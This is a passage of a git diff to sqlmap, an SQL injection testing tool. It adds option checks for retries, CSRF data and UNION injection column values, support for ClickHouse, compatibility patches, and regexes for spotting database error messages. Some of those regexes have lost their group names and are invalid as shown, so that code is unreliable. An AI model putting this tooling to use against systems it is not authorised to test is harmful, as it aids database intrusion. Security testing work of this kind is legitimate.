conf.retryOn: + try: + re.compile(conf.retryOn) + except Exception as ex: + errMsg = "invalid regular expression '%s' ('%s')" % (conf.retryOn, getSafeExString(ex)) + raise SqlmapSyntaxException(errMsg) + + if conf.retries == defaults.retries: + conf.retries = 5 * conf.retries + + warnMsg = "increasing default value for " + warnMsg += "option '--retries' to %d because " % conf.retries + warnMsg += "option '--retry-on' was provided" + logger.warning(warnMsg) + + if conf.cookieDel and len(conf.cookieDel) != 1: errMsg = "option '--cookie-del' should contain a single character (e.g. ';')" raise SqlmapSyntaxException(errMsg) @@ -2706,6 +2760,10 @@ def _basicOptionValidation(): errMsg = "option '--csrf-method' requires usage of option '--csrf-token'" raise SqlmapSyntaxException(errMsg) + if conf.csrfData and not conf.csrfToken: + errMsg = "option '--csrf-data' requires usage of option '--csrf-token'" + raise SqlmapSyntaxException(errMsg) + if conf.csrfToken and conf.threads > 1: errMsg = "option '--csrf-url' is incompatible with option '--threads'" raise SqlmapSyntaxException(errMsg) @@ -2758,6 +2816,11 @@ def _basicOptionValidation(): errMsg = "option '--dump-format' accepts one of following values: %s" % ", ".join(getPublicTypeMembers(DUMP_FORMAT, True)) raise SqlmapSyntaxException(errMsg) + if conf.uValues and (not re.search(r"\A['\w\s.,()%s-]+\Z" % CUSTOM_INJECTION_MARK_CHAR, conf.uValues) or conf.uValues.count(CUSTOM_INJECTION_MARK_CHAR) != 1): + errMsg = "option '--union-values' must contain valid UNION column values, along with the injection position " + errMsg += "(e.g. 'NULL,1,%s,NULL')" % CUSTOM_INJECTION_MARK_CHAR + raise SqlmapSyntaxException(errMsg) + if conf.skip and conf.testParameter: if intersect(conf.skip, conf.testParameter): errMsg = "option '--skip' is incompatible with option '-p'" @@ -2784,10 +2847,6 @@ def _basicOptionValidation(): errMsg = "value for option '--time-sec' must be a positive integer" raise SqlmapSyntaxException(errMsg) - if conf.uChar and not re.match(UNION_CHAR_REGEX, conf.uChar): - errMsg = "value for option '--union-char' must be an alpha-numeric value (e.g. 1)" - raise SqlmapSyntaxException(errMsg) - if conf.hashFile and any((conf.direct, conf.url, conf.logFile, conf.bulkFile, conf.googleDork, conf.configFile, conf.requestFile, conf.updateAll, conf.smokeTest, conf.wizard, conf.dependencies, conf.purge, conf.listTampers)): errMsg = "option '--crack' should be used as a standalone" raise SqlmapSyntaxException(errMsg) @@ -2813,10 +2872,13 @@ def _basicOptionValidation(): else: conf.encoding = _ - if conf.loadCookies: - if not os.path.exists(conf.loadCookies): - errMsg = "cookies file '%s' does not exist" % conf.loadCookies - raise SqlmapFilePathException(errMsg) + if conf.fileWrite and not os.path.isfile(conf.fileWrite): + errMsg = "file '%s' does not exist" % os.path.abspath(conf.fileWrite) + raise SqlmapFilePathException(errMsg) + + if conf.loadCookies and not os.path.exists(conf.loadCookies): + errMsg = "cookies file '%s' does not exist" % os.path.abspath(conf.loadCookies) + raise SqlmapFilePathException(errMsg) def initOptions(inputOptions=AttribDict(), overrideOptions=False): _setConfAttributes() diff --git a/lib/core/optiondict.py b/lib/core/optiondict.py index c22b9d11ee0..14ad4470097 100644 --- a/lib/core/optiondict.py +++ b/lib/core/optiondict.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) See the file 'LICENSE' for copying permission """ @@ -30,6 +30,7 @@ "liveCookies": "string", "loadCookies": "string", "dropSetCookie": "boolean", + "http2": "boolean", "agent": "string", "mobile": "boolean", "randomAgent": "boolean", @@ -39,6 +40,7 @@ "authType": "string", "authCred": "string", "authFile": "string", + "abortCode": "string", "ignoreCode": "string", "ignoreProxy": "boolean", "ignoreRedirects": "boolean", @@ -54,6 +56,7 @@ "delay": "float", "timeout": "float", "retries": "integer", + "retryOn": "string", "rParam": "string", "safeUrl": "string", "safePost": "string", @@ -63,6 +66,7 @@ "csrfToken": "string", "csrfUrl": "string", "csrfMethod": "string", + "csrfData": "string", "csrfRetries": "integer", "forceSSL": "boolean", "chunked": "boolean", @@ -115,6 +119,7 @@ "uCols": "string", "uChar": "string", "uFrom": "string", + "uValues": "string", "dnsDomain": "string", "secondUrl": "string", "secondReq": "string", @@ -202,6 +207,7 @@ "General": { "trafficFile": "string", + "abortOnEmpty": "boolean", "answers": "string", "batch": "boolean", "base64Parameter": "string", @@ -213,6 +219,7 @@ "crawlDepth": "integer", "crawlExclude": "string", "csvDel": "string", + "dumpFile": "string", "dumpFormat": "string", "encoding": "string", "eta": "boolean", @@ -233,6 +240,8 @@ "skipWaf": "boolean", "testFilter": "string", "testSkip": "string", + "timeLimit": "float", + "unsafeNaming": "boolean", "webRoot": "string", }, @@ -241,7 +250,10 @@ "beep": "boolean", "dependencies": "boolean", "disableColoring": "boolean", + "disableHashing": "boolean", "listTampers": "boolean", + "noLogging": "boolean", + "noTruncate": "boolean", "offline": "boolean", "purge": "boolean", "resultsFile": "string", diff --git a/lib/core/patch.py b/lib/core/patch.py index c2847d1aa5c..2d29fb6ea35 100644 --- a/lib/core/patch.py +++ b/lib/core/patch.py @@ -1,11 +1,14 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) See the file 'LICENSE' for copying permission """ import codecs +import collections +import inspect +import logging import os import random import re @@ -35,9 +38,12 @@ from lib.core.enums import PLACE from lib.core.option import _setHTTPHandlers from lib.core.option import setVerbosity +from lib.core.settings import INVALID_UNICODE_PRIVATE_AREA +from lib.core.settings import INVALID_UNICODE_CHAR_FORMAT from lib.core.settings import IS_WIN from lib.request.templates import getPageTemplate from thirdparty import six +from thirdparty.six import unichr as _unichr from thirdparty.six.moves import http_client as _http_client _rand = 0 @@ -84,7 +90,7 @@ def _(self, *args): if match and match.group(1).upper() != PLACE.POST: PLACE.CUSTOM_POST = PLACE.CUSTOM_POST.replace("POST", "%s (body)" % match.group(1)) - # https://github.com/sqlmapproject/sqlmap/issues/4314 + # Reference: https://github.com/sqlmapproject/sqlmap/issues/4314 try: os.urandom(1) except NotImplementedError: @@ -93,6 +99,58 @@ def _(self, *args): else: os.urandom = lambda size: "".join(chr(random.randint(0, 255)) for _ in xrange(size)) + # Reference: https://github.com/sqlmapproject/sqlmap/issues/5727 + # Reference: https://stackoverflow.com/a/14076841 + try: + import pymysql + pymysql.install_as_MySQLdb() + except (ImportError, AttributeError): + pass + + # Reference: https://github.com/bottlepy/bottle/blob/df67999584a0e51ec5b691146c7fa4f3c87f5aac/bottle.py + # Reference: https://python.readthedocs.io/en/v2.7.2/library/inspect.html#inspect.getargspec + if not hasattr(inspect, "getargspec") and hasattr(inspect, "getfullargspec"): + ArgSpec = collections.namedtuple("ArgSpec", ("args", "varargs", "keywords", "defaults")) + + def makelist(data): + if isinstance(data, (tuple, list, set, dict)): + return list(data) + elif data: + return [data] + else: + return [] + + def getargspec(func): + spec = inspect.getfullargspec(func) + kwargs = makelist(spec[0]) + makelist(spec.kwonlyargs) + return ArgSpec(kwargs, spec[1], spec[2], spec[3]) + + inspect.getargspec = getargspec + + # Installing "reversible" unicode (decoding) error handler + def _reversible(ex): + if INVALID_UNICODE_PRIVATE_AREA: + return (u"".join(_unichr(int('000f00%2x' % (_ if isinstance(_, int) else ord(_)), 16)) for _ in ex.object[ex.start:ex.end]), ex.end) + else: + return (u"".join(INVALID_UNICODE_CHAR_FORMAT % (_ if isinstance(_, int) else ord(_)) for _ in ex.object[ex.start:ex.end]), ex.end) + + codecs.register_error("reversible", _reversible) + + # Reference: https://github.com/sqlmapproject/sqlmap/issues/5731 + if not hasattr(logging, "_acquireLock"): + def _acquireLock(): + if logging._lock: + logging._lock.acquire() + + logging._acquireLock = _acquireLock + + if not hasattr(logging, "_releaseLock"): + def _releaseLock(): + if logging._lock: + logging._lock.release() + + logging._releaseLock = _releaseLock + def resolveCrossReferences(): """ Place for cross-reference resolution diff --git a/lib/core/profiling.py b/lib/core/profiling.py index 4f96fb3ad21..1219cb12294 100644 --- a/lib/core/profiling.py +++ b/lib/core/profiling.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) See the file 'LICENSE' for copying permission """ diff --git a/lib/core/readlineng.py b/lib/core/readlineng.py index 7871b9caaf3..b2ba5f02129 100644 --- a/lib/core/readlineng.py +++ b/lib/core/readlineng.py @@ -1,16 +1,11 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) See the file 'LICENSE' for copying permission """ -from lib.core.data import logger -from lib.core.settings import IS_WIN -from lib.core.settings import PLATFORM - _readline = None - try: from readline import * import readline as _readline @@ -21,6 +16,10 @@ except: pass +from lib.core.data import logger +from lib.core.settings import IS_WIN +from lib.core.settings import PLATFORM + if IS_WIN and _readline: try: _outputfile = _readline.GetOutputFile() diff --git a/lib/core/replication.py b/lib/core/replication.py index 11889478ab9..5d91c470da0 100644 --- a/lib/core/replication.py +++ b/lib/core/replication.py @@ -1,12 +1,13 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) See the file 'LICENSE' for copying permission """ import sqlite3 +from lib.core.common import cleanReplaceUnicode from lib.core.common import getSafeExString from lib.core.common import unsafeSQLIdentificatorNaming from lib.core.exception import SqlmapConnectionException @@ -81,7 +82,10 @@ def insert(self, values): def execute(self, sql, parameters=None): try: - self.parent.cursor.execute(sql, parameters or []) + try: + self.parent.cursor.execute(sql, parameters or []) + except UnicodeError: + self.parent.cursor.execute(sql, cleanReplaceUnicode(parameters or [])) except sqlite3.OperationalError as ex: errMsg = "problem occurred ('%s') while accessing sqlite database " % getSafeExString(ex, UNICODE_ENCODING) errMsg += "located at '%s'. Please make sure that " % self.parent.dbpath diff --git a/lib/core/revision.py b/lib/core/revision.py index 9e3cd5455e2..99c5f4091f9 100644 --- a/lib/core/revision.py +++ b/lib/core/revision.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) See the file 'LICENSE' for copying permission """ diff --git a/lib/core/session.py b/lib/core/session.py index 00104ebeaf7..95a29aaec86 100644 --- a/lib/core/session.py +++ b/lib/core/session.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) See the file 'LICENSE' for copying permission """ diff --git a/lib/core/settings.py b/lib/core/settings.py index ed567577e2f..9c6c173f11f 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) See the file 'LICENSE' for copying permission """ @@ -17,10 +17,9 @@ from lib.core.enums import DBMS_DIRECTORY_NAME from lib.core.enums import OS from thirdparty import six -from thirdparty.six import unichr as _unichr # sqlmap version (...) -VERSION = "1.5.10.13" +VERSION = "1.9.6.1" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) @@ -61,6 +60,9 @@ LOWER_RATIO_BOUND = 0.02 UPPER_RATIO_BOUND = 0.98 +# For filling in case of dumb push updates +DUMMY_JUNK = "ahy9Ouge" + # Markers for special cases when parameter values contain html encoded characters PARAMETER_AMP_MARKER = "__AMP__" PARAMETER_SEMICOLON_MARKER = "__SEMICOLON__" @@ -68,11 +70,11 @@ PARAMETER_PERCENTAGE_MARKER = "__PERCENTAGE__" PARTIAL_VALUE_MARKER = "__PARTIAL_VALUE__" PARTIAL_HEX_VALUE_MARKER = "__PARTIAL_HEX_VALUE__" -URI_QUESTION_MARKER = "__QUESTION_MARK__" -ASTERISK_MARKER = "__ASTERISK_MARK__" -REPLACEMENT_MARKER = "__REPLACEMENT_MARK__" -BOUNDED_BASE64_MARKER = "__BOUNDED_BASE64_MARK__" -BOUNDED_INJECTION_MARKER = "__BOUNDED_INJECTION_MARK__" +URI_QUESTION_MARKER = "__QUESTION__" +ASTERISK_MARKER = "__ASTERISK__" +REPLACEMENT_MARKER = "__REPLACEMENT__" +BOUNDED_BASE64_MARKER = "__BOUNDED_BASE64__" +BOUNDED_INJECTION_MARKER = "__BOUNDED_INJECTION__" SAFE_VARIABLE_MARKER = "__SAFE__" SAFE_HEX_MARKER = "__SAFE_HEX__" DOLLAR_MARKER = "__DOLLAR__" @@ -283,6 +285,7 @@ ALTIBASE_SYSTEM_DBS = ("SYSTEM_",) MIMERSQL_SYSTEM_DBS = ("information_schema", "SYSTEM",) CRATEDB_SYSTEM_DBS = ("information_schema", "pg_catalog", "sys") +CLICKHOUSE_SYSTEM_DBS = ("information_schema", "INFORMATION_SCHEMA", "system") CUBRID_SYSTEM_DBS = ("DBA",) CACHE_SYSTEM_DBS = ("%Dictionary", "INFORMATION_SCHEMA", "%SYS") EXTREMEDB_SYSTEM_DBS = ("",) @@ -293,7 +296,7 @@ # Note: () + () MSSQL_ALIASES = ("microsoft sql server", "mssqlserver", "mssql", "ms") MYSQL_ALIASES = ("mysql", "my") + ("mariadb", "maria", "memsql", "tidb", "percona", "drizzle") -PGSQL_ALIASES = ("postgresql", "postgres", "pgsql", "psql", "pg") + ("cockroach", "cockroachdb", "amazon redshift", "redshift", "greenplum", "yellowbrick", "enterprisedb", "yugabyte", "yugabytedb") +PGSQL_ALIASES = ("postgresql", "postgres", "pgsql", "psql", "pg") + ("cockroach", "cockroachdb", "amazon redshift", "redshift", "greenplum", "yellowbrick", "enterprisedb", "yugabyte", "yugabytedb", "opengauss") ORACLE_ALIASES = ("oracle", "orcl", "ora", "or") SQLITE_ALIASES = ("sqlite", "sqlite3") ACCESS_ALIASES = ("microsoft access", "msaccess", "access", "jet") @@ -313,6 +316,7 @@ MIMERSQL_ALIASES = ("mimersql", "mimer") CRATEDB_ALIASES = ("cratedb", "crate") CUBRID_ALIASES = ("cubrid",) +CLICKHOUSE_ALIASES = ("clickhouse",) CACHE_ALIASES = ("intersystems cache", "cachedb", "cache", "iris") EXTREMEDB_ALIASES = ("extremedb", "extreme") FRONTBASE_ALIASES = ("frontbase",) @@ -321,17 +325,17 @@ DBMS_DIRECTORY_DICT = dict((getattr(DBMS, _), getattr(DBMS_DIRECTORY_NAME, _)) for _ in dir(DBMS) if not _.startswith("_")) -SUPPORTED_DBMS = set(MSSQL_ALIASES + MYSQL_ALIASES + PGSQL_ALIASES + ORACLE_ALIASES + SQLITE_ALIASES + ACCESS_ALIASES + FIREBIRD_ALIASES + MAXDB_ALIASES + SYBASE_ALIASES + DB2_ALIASES + HSQLDB_ALIASES + H2_ALIASES + INFORMIX_ALIASES + MONETDB_ALIASES + DERBY_ALIASES + VERTICA_ALIASES + MCKOI_ALIASES + PRESTO_ALIASES + ALTIBASE_ALIASES + MIMERSQL_ALIASES + CRATEDB_ALIASES + CUBRID_ALIASES + CACHE_ALIASES + EXTREMEDB_ALIASES + RAIMA_ALIASES + VIRTUOSO_ALIASES) +SUPPORTED_DBMS = set(MSSQL_ALIASES + MYSQL_ALIASES + PGSQL_ALIASES + ORACLE_ALIASES + SQLITE_ALIASES + ACCESS_ALIASES + FIREBIRD_ALIASES + MAXDB_ALIASES + SYBASE_ALIASES + DB2_ALIASES + HSQLDB_ALIASES + H2_ALIASES + INFORMIX_ALIASES + MONETDB_ALIASES + DERBY_ALIASES + VERTICA_ALIASES + MCKOI_ALIASES + PRESTO_ALIASES + ALTIBASE_ALIASES + MIMERSQL_ALIASES + CLICKHOUSE_ALIASES + CRATEDB_ALIASES + CUBRID_ALIASES + CACHE_ALIASES + EXTREMEDB_ALIASES + RAIMA_ALIASES + VIRTUOSO_ALIASES) SUPPORTED_OS = ("linux", "windows") -DBMS_ALIASES = ((DBMS.MSSQL, MSSQL_ALIASES), (DBMS.MYSQL, MYSQL_ALIASES), (DBMS.PGSQL, PGSQL_ALIASES), (DBMS.ORACLE, ORACLE_ALIASES), (DBMS.SQLITE, SQLITE_ALIASES), (DBMS.ACCESS, ACCESS_ALIASES), (DBMS.FIREBIRD, FIREBIRD_ALIASES), (DBMS.MAXDB, MAXDB_ALIASES), (DBMS.SYBASE, SYBASE_ALIASES), (DBMS.DB2, DB2_ALIASES), (DBMS.HSQLDB, HSQLDB_ALIASES), (DBMS.H2, H2_ALIASES), (DBMS.INFORMIX, INFORMIX_ALIASES), (DBMS.MONETDB, MONETDB_ALIASES), (DBMS.DERBY, DERBY_ALIASES), (DBMS.VERTICA, VERTICA_ALIASES), (DBMS.MCKOI, MCKOI_ALIASES), (DBMS.PRESTO, PRESTO_ALIASES), (DBMS.ALTIBASE, ALTIBASE_ALIASES), (DBMS.MIMERSQL, MIMERSQL_ALIASES), (DBMS.CRATEDB, CRATEDB_ALIASES), (DBMS.CUBRID, CUBRID_ALIASES), (DBMS.CACHE, CACHE_ALIASES), (DBMS.EXTREMEDB, EXTREMEDB_ALIASES), (DBMS.FRONTBASE, FRONTBASE_ALIASES), (DBMS.RAIMA, RAIMA_ALIASES), (DBMS.VIRTUOSO, VIRTUOSO_ALIASES)) +DBMS_ALIASES = ((DBMS.MSSQL, MSSQL_ALIASES), (DBMS.MYSQL, MYSQL_ALIASES), (DBMS.PGSQL, PGSQL_ALIASES), (DBMS.ORACLE, ORACLE_ALIASES), (DBMS.SQLITE, SQLITE_ALIASES), (DBMS.ACCESS, ACCESS_ALIASES), (DBMS.FIREBIRD, FIREBIRD_ALIASES), (DBMS.MAXDB, MAXDB_ALIASES), (DBMS.SYBASE, SYBASE_ALIASES), (DBMS.DB2, DB2_ALIASES), (DBMS.HSQLDB, HSQLDB_ALIASES), (DBMS.H2, H2_ALIASES), (DBMS.INFORMIX, INFORMIX_ALIASES), (DBMS.MONETDB, MONETDB_ALIASES), (DBMS.DERBY, DERBY_ALIASES), (DBMS.VERTICA, VERTICA_ALIASES), (DBMS.MCKOI, MCKOI_ALIASES), (DBMS.PRESTO, PRESTO_ALIASES), (DBMS.ALTIBASE, ALTIBASE_ALIASES), (DBMS.MIMERSQL, MIMERSQL_ALIASES), (DBMS.CLICKHOUSE, CLICKHOUSE_ALIASES), (DBMS.CRATEDB, CRATEDB_ALIASES), (DBMS.CUBRID, CUBRID_ALIASES), (DBMS.CACHE, CACHE_ALIASES), (DBMS.EXTREMEDB, EXTREMEDB_ALIASES), (DBMS.FRONTBASE, FRONTBASE_ALIASES), (DBMS.RAIMA, RAIMA_ALIASES), (DBMS.VIRTUOSO, VIRTUOSO_ALIASES)) USER_AGENT_ALIASES = ("ua", "useragent", "user-agent") REFERER_ALIASES = ("ref", "referer", "referrer") HOST_ALIASES = ("host",) # DBMSes with upper case identifiers -UPPER_CASE_DBMSES = set((DBMS.ORACLE, DBMS.DB2, DBMS.FIREBIRD, DBMS.MAXDB, DBMS.H2, DBMS.DERBY, DBMS.ALTIBASE)) +UPPER_CASE_DBMSES = set((DBMS.ORACLE, DBMS.DB2, DBMS.FIREBIRD, DBMS.MAXDB, DBMS.H2, DBMS.HSQLDB, DBMS.DERBY, DBMS.ALTIBASE)) # Default schemas to use (when unable to enumerate) H2_DEFAULT_SCHEMA = HSQLDB_DEFAULT_SCHEMA = "PUBLIC" @@ -363,6 +367,7 @@ "getCurrentUser", "getCurrentDb", "getPasswordHashes", + "getDbs", "getTables", "getColumns", "getSchema", @@ -412,6 +417,7 @@ r"(?P[^\n>]{0,100}SQL Syntax[^\n<]+)", r"(?s)
  • Error Type:
    (?P.+?)
    • ", r"CDbCommand (?P[^<>\n]*SQL[^<>\n]+)", + r"Code: \d+. DB::Exception: (?P[^<>\n]*)", r"error '[0-9a-f]{8}'((<[^>]+>)|\s)+(?P[^<>]+)", r"\[[^\n\]]{1,100}(ODBC|JDBC)[^\n\]]+\](\[[^\]]+\])?(?P[^\n]+(in query expression|\(SQL| at /[^ ]+pdo)[^\n<]+)", r"(?Pquery error: SELECT[^<>]+)" @@ -427,7 +433,7 @@ JAVASCRIPT_HREF_REGEX = r'